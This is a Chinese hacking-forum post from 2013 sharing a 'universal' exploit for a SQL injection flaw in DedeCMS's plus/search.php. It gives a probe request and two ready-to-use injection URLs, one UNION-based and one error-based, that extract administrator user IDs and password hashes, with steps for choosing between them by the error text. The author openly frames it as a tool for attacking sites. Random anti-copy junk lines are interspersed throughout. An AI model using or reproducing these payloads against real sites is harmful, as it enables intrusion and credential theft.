中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
4 s/ S5 r" y- b! J6 t
1 Z# r4 Z4 e8 h, X' F: I9 J% D
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
4 I A) p; H: S/ N
+ t: |+ @0 g3 `% T/ H7 j6 H+ o
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
$ J/ p( m6 U( x" q% t- d
% F5 Q3 G7 A4 w0 n J8 j- Q) Y
我一般是这样测试的:
- {3 x* i2 E' O7 R* b
* w) ^1 s& {5 I' Y4 G) Q6 g
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
3 q2 i2 G% j2 q# p* \8 ^) A6 N/ G
+ t9 M a8 [8 V0 B! V5 o& U
转载不加作者名的没JJ
" R% l5 P" l( a" w* r B+ L+ ~
! G+ t# U$ m) ~. K& `5 m
作者:鬼哥
' E& b$ h- Y' Y
! w/ R* d9 z$ O1 Z; }
& W2 S9 d, J/ r; D Q( b) x
! C( x: \; b% l t" T
看结果如果提示
$ f2 @7 R J( g( q+ j
3 a/ S3 O/ Q8 g/ k4 Z/ _9 i
Safe Alert: Request Error step 2 !
" L j( C7 M- ?, `
6 p% `* }% I" @5 s
那么直接用下面的exp
+ y T ~/ e5 h% N
& w6 r- D2 J+ I$ v' D" @/ I7 j
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
2 f" k$ c& j2 `5 u/ [& [9 L
7 L0 s& K3 V. J) ?" I
* t; u9 @! y ?& l6 G6 Y
看结果如果提示
" f" j! \6 [0 L7 D8 I" K
! J$ D; [: e# N. I
Safe Alert: Request Error step 1 !
0 I# N8 I, Y1 e. w; k1 P1 n
F& D/ O/ l4 a1 u+ C% _1 y
那么直接用下面的exp
, Z5 j T3 G2 x- i% @
; |* N8 L" f" P' j
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
5 D T2 X9 D: B" A4 h
w# @/ B$ S& ]0 i2 o7 e
9 f b0 g: I, r" x
如果正常显示证明漏洞不存在了。
$ T8 Y9 r$ x- E# T8 d3 L
- p; T$ v9 [3 Y' Z m
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2